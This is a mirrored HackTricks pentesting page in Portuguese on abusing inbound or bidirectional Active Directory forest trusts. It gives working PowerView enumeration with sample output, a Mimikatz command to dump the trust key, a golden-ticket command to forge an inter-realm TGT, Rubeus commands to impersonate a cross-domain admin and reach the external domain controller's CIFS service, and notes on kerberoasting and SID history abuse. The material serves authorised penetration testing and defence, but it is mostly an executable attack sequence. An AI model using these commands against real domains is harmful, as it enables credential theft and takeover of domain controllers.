mirror of
https://github.com/carlospolop/hacktricks
synced 2024-12-21 02:23:30 +00:00
135 lines
8.3 KiB
Markdown
135 lines
8.3 KiB
Markdown
# Domínio da Floresta Externa - Apenas de um sentido (Entrada) ou bidirecional
|
|
|
|
<details>
|
|
|
|
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
|
|
|
* Você trabalha em uma **empresa de cibersegurança**? Gostaria de ver sua **empresa anunciada no HackTricks**? ou gostaria de ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
|
|
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
|
|
* Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
|
|
* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo do Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
|
* **Compartilhe seus truques de hacking enviando PRs para o [repositório hacktricks](https://github.com/carlospolop/hacktricks) e [repositório hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud)**.
|
|
|
|
</details>
|
|
|
|
Neste cenário, um domínio externo está confiando em você (ou ambos estão confiando um no outro), então você pode obter algum tipo de acesso sobre ele.
|
|
|
|
## Enumeração
|
|
|
|
Primeiramente, você precisa **enumerar** a **confiança**:
|
|
```powershell
|
|
Get-DomainTrust
|
|
SourceName : a.domain.local --> Current domain
|
|
TargetName : domain.external --> Destination domain
|
|
TrustType : WINDOWS-ACTIVE_DIRECTORY
|
|
TrustAttributes :
|
|
TrustDirection : Inbound --> Inboud trust
|
|
WhenCreated : 2/19/2021 10:50:56 PM
|
|
WhenChanged : 2/19/2021 10:50:56 PM
|
|
|
|
# Get name of DC of the other domain
|
|
Get-DomainComputer -Domain domain.external -Properties DNSHostName
|
|
dnshostname
|
|
-----------
|
|
dc.domain.external
|
|
|
|
# Groups that contain users outside of its domain and return its members
|
|
Get-DomainForeignGroupMember -Domain domain.external
|
|
GroupDomain : domain.external
|
|
GroupName : Administrators
|
|
GroupDistinguishedName : CN=Administrators,CN=Builtin,DC=domain,DC=external
|
|
MemberDomain : domain.external
|
|
MemberName : S-1-5-21-3263068140-2042698922-2891547269-1133
|
|
MemberDistinguishedName : CN=S-1-5-21-3263068140-2042698922-2891547269-1133,CN=ForeignSecurityPrincipals,DC=domain,
|
|
DC=external
|
|
|
|
# Get name of the principal in the current domain member of the cross-domain group
|
|
ConvertFrom-SID S-1-5-21-3263068140-2042698922-2891547269-1133
|
|
DEV\External Admins
|
|
|
|
# Get members of the cros-domain group
|
|
Get-DomainGroupMember -Identity "External Admins" | select MemberName
|
|
MemberName
|
|
----------
|
|
crossuser
|
|
|
|
# Lets list groups members
|
|
## Check how the "External Admins" is part of the Administrators group in that DC
|
|
Get-NetLocalGroupMember -ComputerName dc.domain.external
|
|
ComputerName : dc.domain.external
|
|
GroupName : Administrators
|
|
MemberName : SUB\External Admins
|
|
SID : S-1-5-21-3263068140-2042698922-2891547269-1133
|
|
IsGroup : True
|
|
IsDomain : True
|
|
|
|
# You may also enumerate where foreign groups and/or users have been assigned
|
|
# local admin access via Restricted Group by enumerating the GPOs in the foreign domain.
|
|
```
|
|
Na enumeração anterior, foi descoberto que o usuário **`crossuser`** está dentro do grupo **`External Admins`** que possui **acesso de administrador** dentro do **DC do domínio externo**.
|
|
|
|
## Acesso Inicial
|
|
|
|
Se você **não conseguiu** encontrar nenhum **acesso especial** do seu usuário no outro domínio, ainda é possível voltar para a Metodologia do AD e tentar **elevar privilégios a partir de um usuário não privilegiado** (coisas como kerberoasting, por exemplo):
|
|
|
|
Você pode usar as funções do **Powerview** para **enumerar** o **outro domínio** usando o parâmetro `-Domain` como em:
|
|
```powershell
|
|
Get-DomainUser -SPN -Domain domain_name.local | select SamAccountName
|
|
```
|
|
## Impersonação
|
|
|
|
### Login
|
|
|
|
Usando um método regular com as credenciais do usuário que tem acesso ao domínio externo, você deve ser capaz de acessar:
|
|
```powershell
|
|
Enter-PSSession -ComputerName dc.external_domain.local -Credential domain\administrator
|
|
```
|
|
### Abuso do SID History
|
|
|
|
Também é possível abusar do [**SID History**](sid-history-injection.md) em uma confiança de floresta.
|
|
|
|
Se um usuário é migrado **de uma floresta para outra** e **o Filtro SID não está habilitado**, torna-se possível **adicionar um SID da outra floresta**, e este **SID** será **adicionado** ao **token do usuário** ao autenticar **através da confiança**.
|
|
|
|
{% hint style="warning" %}
|
|
Como lembrete, você pode obter a chave de assinatura com
|
|
```powershell
|
|
Invoke-Mimikatz -Command '"lsadump::trust /patch"' -ComputerName dc.domain.local
|
|
```
|
|
{% endhint %}
|
|
|
|
Você poderia **assinar com** a chave **confiável** um **TGT se passando** pelo usuário do domínio atual.
|
|
```bash
|
|
# Get a TGT for the cross-domain privileged user to the other domain
|
|
Invoke-Mimikatz -Command '"kerberos::golden /user:<username> /domain:<current domain> /SID:<current domain SID> /rc4:<trusted key> /target:<external.domain> /ticket:C:\path\save\ticket.kirbi"'
|
|
|
|
# Use this inter-realm TGT to request a TGS in the target domain to access the CIFS service of the DC
|
|
## We are asking to access CIFS of the external DC because in the enumeration we show the group was part of the local administrators group
|
|
Rubeus.exe asktgs /service:cifs/dc.doamin.external /domain:dc.domain.external /dc:dc.domain.external /ticket:C:\path\save\ticket.kirbi /nowrap
|
|
|
|
# Now you have a TGS to access the CIFS service of the domain controller
|
|
```
|
|
### Caminho completo para se passar pelo usuário
|
|
```bash
|
|
# Get a TGT of the user with cross-domain permissions
|
|
Rubeus.exe asktgt /user:crossuser /domain:sub.domain.local /aes256:70a673fa756d60241bd74ca64498701dbb0ef9c5fa3a93fe4918910691647d80 /opsec /nowrap
|
|
|
|
# Get a TGT from the current domain for the target domain for the user
|
|
Rubeus.exe asktgs /service:krbtgt/domain.external /domain:sub.domain.local /dc:dc.sub.domain.local /ticket:doIFdD[...snip...]MuSU8= /nowrap
|
|
|
|
# Use this inter-realm TGT to request a TGS in the target domain to access the CIFS service of the DC
|
|
## We are asking to access CIFS of the external DC because in the enumeration we show the group was part of the local administrators group
|
|
Rubeus.exe asktgs /service:cifs/dc.doamin.external /domain:dc.domain.external /dc:dc.domain.external /ticket:doIFMT[...snip...]5BTA== /nowrap
|
|
|
|
# Now you have a TGS to access the CIFS service of the domain controller
|
|
```
|
|
<details>
|
|
|
|
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
|
|
|
* Você trabalha em uma **empresa de cibersegurança**? Gostaria de ver sua **empresa anunciada no HackTricks**? ou gostaria de ter acesso à **última versão do PEASS ou baixar o HackTricks em PDF**? Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
|
|
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
|
|
* Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
|
|
* **Junte-se ao** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me no** **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
|
* **Compartilhe seus truques de hacking enviando PRs para o [repositório hacktricks](https://github.com/carlospolop/hacktricks) e [repositório hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud)**.
|
|
|
|
</details>
|